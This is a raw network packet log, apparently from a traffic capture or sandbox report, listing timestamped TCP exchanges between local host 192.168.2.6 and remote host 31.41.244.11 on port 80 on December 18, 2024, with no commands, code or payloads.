                                                                                                                                                              Dec 18, 2024 11:47:18.863373995 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.863410950 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.863535881 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.863580942 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.864748001 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.864799976 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.864984989 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.865044117 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.865710020 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.865758896 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.865844011 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.865891933 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.866941929 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.866992950 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.867023945 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.867075920 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.868077040 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.868129015 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.868169069 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.868220091 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.869232893 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.869282961 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.869364023 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.869422913 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.870600939 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.870642900 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.871557951 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.871623993 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.871627092 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.871639967 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.871674061 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.871699095 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.872766018 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.872812986 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.873097897 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.873150110 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.873986006 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.874034882 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.874300957 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.874386072 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.875117064 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.875128984 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.875168085 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.876230955 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.876277924 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.876334906 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.876382113 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.877401114 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.877448082 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.877619028 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.877657890 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.878587008 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.878633976 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.878778934 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.878823996 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.879776955 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.879832029 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.880054951 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.880109072 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.880914927 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.880961895 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.881048918 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.881103992 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.882085085 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.882142067 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.882302999 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.882352114 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.883260012 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.883311033 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.883462906 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.883514881 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.884514093 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.884567022 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.884766102 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.884807110 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.885576963 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.885626078 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.885706902 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.885754108 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.886756897 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.886822939 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.887001038 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.887056112 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.888392925 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.888444901 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.888700008 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.888745070 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.889503002 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.889539957 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.889574051 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.889615059 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.891150951 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.891201019 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.891288042 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.891328096 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.892183065 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.892265081 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.892345905 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.892385006 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.893426895 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.893480062 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.022499084 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.022552967 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.023127079 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.023166895 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.023194075 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.023211956 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.023246050 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.024077892 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.024369955 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.024415970 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.024585962 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.024624109 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.025497913 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.025541067 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.025808096 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.025847912 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.026318073 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.026377916 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.026689053 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.026735067 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.027475119 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.027524948 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.027868986 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.027909040 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.028723001 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.028760910 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.028825998 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.028865099 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.029822111 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.029877901 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.030003071 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.030049086 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.031029940 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.031131029 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.031162024 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.031178951 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.032207966 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.032262087 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.032522917 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.032567024 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.033529043 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.033570051 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.033847094 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.033884048 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.034785032 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.034832954 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.035265923 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.035305023 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.035773993 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.035819054 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.035860062 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.035980940 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.036925077 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.036974907 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.037020922 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.037060022 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.038055897 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.038098097 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.038522959 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.038577080 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.039196014 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.039235115 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.039343119 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.039391041 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.040421963 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.040460110 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.040833950 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.040872097 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.041646004 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.041692972 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.041753054 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.041800976 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.042994022 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.043035030 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.043410063 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.043467045 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.044110060 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.044127941 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.044153929 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.044171095 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.045336008 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.045384884 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.045471907 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.045557022 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.046755075 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.046806097 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.047007084 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.047110081 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.047593117 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.047693014 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.047739983 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.047795057 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.048593044 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.048638105 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.049074888 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.049120903 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.049679041 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.049741030 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.050008059 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.050241947 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.050925970 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.050973892 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.051171064 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.051218987 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.052084923 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.052133083 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.052366972 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.052413940 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.053203106 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.053292036 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.053544998 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.053589106 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.054472923 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.054538965 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.054682016 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.054722071 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.055550098 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.055591106 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.055663109 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.055726051 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.056708097 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.056747913 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.056890011 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.056935072 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.057912111 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.057952881 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.058936119 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.059066057 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.059108019 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.059120893 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.059309959 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.060305119 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.060363054 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.060376883 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.060463905 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.061423063 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.061501980 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.061677933 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.061733961 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.062567949 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.062619925 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.063369989 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.063692093 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.063853979 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.063868046 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.063906908 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.064951897 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.065009117 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.065093040 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.065136909 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.066116095 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.066164017 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.066298962 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.066523075 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.067257881 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.067303896 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.067310095 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.067352057 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.068555117 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.068608999 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.068697929 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.068736076 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.069792986 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.069834948 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.069912910 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.069953918 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.070789099 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.070852041 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.070939064 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.071052074 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.072052002 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.072102070 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.072280884 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.072417021 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.073100090 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.073158979 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.073216915 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.073265076 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.074295998 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.074341059 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.074491024 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.074538946 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.075551033 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.075599909 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.075737000 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.075778008 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.076653957 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.076699972 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.076766014 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.076807976 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.077855110 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.077896118 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.078160048 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.078212023 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.079063892 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.079112053 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.079545021 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.079591036 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.080131054 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.080214977 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.080249071 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.080290079 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:19.081311941 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.081408978 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:19.081410885 CET4980680192.168.2.631.41.244.11
